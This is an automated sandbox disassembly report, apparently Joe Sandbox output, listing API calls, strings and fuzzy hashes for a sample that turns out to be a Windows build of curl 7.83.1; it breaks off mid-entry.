                                    • API String ID: 760094153-450215437
                                    APIs
                                      • Part of subcall function 00E1E407: htons.WS2_32(?), ref: 00E1E43C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00E1EEDE
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1EEE6
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                      • Part of subcall function 00E1F3FC: closesocket.WS2_32(00E21EF4), ref: 00E1F433
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrclosesockethtonsstrncpy
                                    • String ID: Trying %s:%d...$*$0kv@qv@/lv$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                    • API String ID: 1577232418-1871448354
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: callocmallocrealloc
                                    • String ID: $ $ $-$>
                                    • API String ID: 3005434335-2764683982
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14D69
                                    • _strrchr.LIBCMT ref: 00E14D7E
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14D8E
                                    • _strrchr.LIBCMT ref: 00E14DE2
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14E13
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14E1F
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00E09BEA,?,00000208,?,?,?,?,?,00E0A827,?,?,00000000), ref: 00E14E73
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E09BEA,?,00000208,?,?,?,?,?,00E0A827,?,?,00000000), ref: 00E14E8E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E09BEA,?,00000208,?,?), ref: 00E14EE0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                    • String ID: )i
                                    • API String ID: 3226260525-955181114
                                    APIs
                                    • _strrchr.LIBCMT ref: 00E0D165
                                    • _strrchr.LIBCMT ref: 00E0D16F
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E0D198
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002), ref: 00E0D1D9
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001), ref: 00E0D1F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00E0D27A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0D2A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0D2BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    Similarity
                                    • API ID: free$_strrchr$_strdupmallocstrncpy
                                    • String ID: ://$|<>"?*
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F232
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E4F280
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E4F309
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F359
                                    Strings
                                    • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 00E4F2C9
                                    • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 00E4F2E0
                                    • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 00E4F33A
                                    • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 00E4F254
                                    • schannel: server certificate name verification failed, xrefs: 00E4F328
                                    • schannel: CertGetNameString() returned no certificate name information, xrefs: 00E4F20E
                                    Similarity
                                    • API ID: free$_strdupmalloc
                                    • String ID: schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E26D39
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E26D52
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E26D69
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E26D80
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26D97
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DAE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DC5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DDC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DF3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E0A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E38
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E66
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00E42A8C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00E42A9E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00E42ABA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00E42ACE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00E42AE7
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: /$MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E30C07
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: %s auth using %s with user '%s'$Authorization$Authorization: Bearer %s$Bearer$NTLM$Negotiate$Proxy$Proxy-authorization$Server$m
                                    APIs
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00E4078E
                                      • Part of subcall function 00E404E4: ___from_strstr_to_strchr.LIBCMT ref: 00E40503
                                    Strings
                                    • Content-Length: %I64d, xrefs: 00E40851
                                    • Can't get the size of file., xrefs: 00E409AF
                                    • failed to resume file:// transfer, xrefs: 00E40A3D
                                    • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 00E40935
                                    • X#, xrefs: 00E408ED
                                    • Accept-ranges: bytes, xrefs: 00E40820
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr_fstat64
                                    • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$X#$failed to resume file:// transfer
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E085D1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0861E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0864D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 00E0867C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E086F7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E08795
                                    Strings
                                    Similarity
                                    • API ID: free$_strdup$malloc
                                    • String ID: %s$--url$option %s: %s
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E07E8E
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E07EA0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07EB2
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E07ECF
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E07EDB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07F11
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07F21
                                    Strings
                                    Similarity
                                    • API ID: __acrt_iob_funcfree$_strdupfclosefopen
                                    • String ID: <stdin>$Failed to read %s
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(curl/7.83.1), ref: 00E0DAFA
                                    Strings
                                    Similarity
                                    • API ID: _strdup
                                    • String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
                                    APIs
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Usage: curl [options...] <url>), ref: 00E089A9
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".), ref: 00E089C3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E08A13
                                    Strings
                                    • all, xrefs: 00E089CC
                                    • category, xrefs: 00E089E6
                                    • Usage: curl [options...] <url>, xrefs: 00E089A2
                                    • Invalid category provided, here is a list of all categories:, xrefs: 00E08A01
                                    • This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all"., xrefs: 00E089BE
                                    Similarity
                                    • API ID: puts$free
                                    • String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A1B4
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A4FB
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A52C
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A54E
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A565
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A211
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A267
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A426
                                    Strings
                                    Similarity
                                    • API ID: free$calloc$malloc
                                    • String ID: CompleteAuthToken failed: %s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)$SSPI: couldn't get auth info
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C0A8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C0C1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C19D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C1B7
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,766B3C50,00000000,00E2182F), ref: 00E1F671
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F685
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F699
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6AD
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6C1
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6D5
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6E9
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6FD
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F70F
                                      • Part of subcall function 00E20830: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2086B
                                    Strings
                                    Similarity
                                    • API ID: free$calloc
                                    • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E24488
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E244AE
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E1A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00E24544
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E1A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00E2456A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E1A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00E24590
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 00E245AC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000), ref: 00E245C1
                                    Similarity
                                    • API ID: malloc$___from_strstr_to_strchrfree
                                    • String ID:
                                    • API String ID: 402731313-0
                                    • Opcode ID: f3f2db75ba36fb470eda99e416a5db7cece7cec92b16db1a84c698f303ba893e
                                    • Instruction ID: c1e46518e2c4063130ed08aac0f623d6d1c46d507da6e91ff863638ddddeb06b
                                    • Opcode Fuzzy Hash: f3f2db75ba36fb470eda99e416a5db7cece7cec92b16db1a84c698f303ba893e
                                    • Instruction Fuzzy Hash: E9817EB2E0022ADFCF14DFA9E8505AEBBF5EF48354B14916AE855F7290DB709D04CB90
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E038EC
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E038F4
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03902
                                      • Part of subcall function 00E01018: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,00E03910), ref: 00E0101E
                                      • Part of subcall function 00E01018: _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,00E03910), ref: 00E01025
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03911
                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03919
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00E0393E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0398D
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E039B7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E039FD
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E03A3D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func$_fileno_strdup$_fstat64_setmodefreeftell
                                    • String ID:
                                    • API String ID: 4154865980-0
                                    • Opcode ID: 8e2f95e17490f98cfc72d465b9708ffc3de50486ff642032dc9ae44a690bb479
                                    • Instruction ID: 4cf0aa08b0b8a59dc6f224c92a92f5cdba0ce31c7b9f6c2de1606399ef0e90b0
                                    • Opcode Fuzzy Hash: 8e2f95e17490f98cfc72d465b9708ffc3de50486ff642032dc9ae44a690bb479
                                    • Instruction Fuzzy Hash: 2B519172D007198FCB14CFB5C88469DBBF9EF84725F20551EE445BB284D7B09E858B40
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E15D8C,766B3C50,00E216C0), ref: 00E149E7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E149FB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A0F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A23
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A37
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A4B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A5F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A73
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A87
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A9B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14AAF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14AC3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 590d31b0371dce6159ab8abf71580d9f9ab3c2b43aca5c877e1d2fde20295d65
                                    • Instruction ID: 0b2a92be3e029257a3db8db57e01c7fdd4722b6ec7b662d27f312b96f2a4d3ff
                                    • Opcode Fuzzy Hash: 590d31b0371dce6159ab8abf71580d9f9ab3c2b43aca5c877e1d2fde20295d65
                                    • Instruction Fuzzy Hash: 7D21B632614929DF8F092F26FC1845DBBA5FF482613158426E405A3675CFF92C198FD0
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(%25,00000001,00000003), ref: 00E24B8D
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E24C01
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00E24C1F
                                    Strings
                                    • %25, xrefs: 00E24B88
                                    • Invalid IPv6 address format, xrefs: 00E24BEF
                                    • No valid port number in connect to host string (%s), xrefs: 00E24C3E
                                    • Please URL encode %% as %%25, see RFC 6874., xrefs: 00E24B9A
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrstrncmpstrtol
                                    • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                    • API String ID: 236576716-4202423297
                                    • Opcode ID: 97291cd211cf58896bdfd09378576a8ccff6ed243e019ff43574d554b790549a
                                    • Instruction ID: 2ac9817653e0df21e94b4829a0aee0cf8a8d0833af24851bd34c5d973702b236
                                    • Opcode Fuzzy Hash: 97291cd211cf58896bdfd09378576a8ccff6ed243e019ff43574d554b790549a
                                    • Instruction Fuzzy Hash: 0C5189B5905325AFEB259F28FC523FDBBA99F0635CF102069E881B72D1D6708949CB40
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2086B
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E208DD
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E208F7
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E2093F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2096E
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20992
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00E2126F), ref: 00E20A02
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20A14
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fclosefree$__acrt_iob_funccallocfopenmalloc
                                    • String ID: Set-Cookie:
                                    • API String ID: 3610089413-2427311273
                                    • Opcode ID: f9eec703798cf73ed797dce5fbb498f4c3d8e686857c0dd3d3d7fed42ed1fb31
                                    • Instruction ID: 238e319b21e9f0df14b81a67bdd9e59183d854d2a9a5c4413ebaa3c798ad3134
                                    • Opcode Fuzzy Hash: f9eec703798cf73ed797dce5fbb498f4c3d8e686857c0dd3d3d7fed42ed1fb31
                                    • Instruction Fuzzy Hash: D4418E317087209FEB295B2978543AEBBD59FC4714F14506EF84AB72D3CAA48C8983D1
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0( ,?,?,?,?,?,?,?,?,?), ref: 00E014A3
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?,?,?,?,?,?,?), ref: 00E01536
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00E0154F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fflushfputcfputs
                                    • String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)$<= Recv header
                                    • API String ID: 2904194729-208095841
                                    • Opcode ID: 638cc3d349e41646bd2223a595ce420fbcf548425e1e90cc776b452ccab78dc5
                                    • Instruction ID: 5b750c87b4cfc64cabb411e2c9c2169df9c1a7035ddde206e55a33f6d67e4c97
                                    • Opcode Fuzzy Hash: 638cc3d349e41646bd2223a595ce420fbcf548425e1e90cc776b452ccab78dc5
                                    • Instruction Fuzzy Hash: 2E41F032A00258AFCF10CF54DC85AAD7BB1EB00319F145499FC1ABF191C2719E94CB91
                                    APIs
                                    • __aulldiv.LIBCMT ref: 00E0E314
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E0E346
                                    • __aulldiv.LIBCMT ref: 00E0E39A
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E0E3CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__aulldiv__ehfuncinfo$??2@
                                    • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--
                                    • API String ID: 1185945948-1858174321
                                    • Opcode ID: 0159bf44aa42cbf1db8c1944e49ac8cace723c6c9908cb3fd788bf57c2b3e91b
                                    • Instruction ID: 35cfa6c284653604011884a68056b569b78bf9a1ea666697e9041b8249671a48
                                    • Opcode Fuzzy Hash: 0159bf44aa42cbf1db8c1944e49ac8cace723c6c9908cb3fd788bf57c2b3e91b
                                    • Instruction Fuzzy Hash: BC310971B407047AEB2166B94C4BFAF6DEDCBC5F90F14A934B904F72D2E5B19E408660
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0781F
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E07833
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(?,00E58E74), ref: 00E0786E
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E58E74), ref: 00E078A2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E078B7
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E078CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
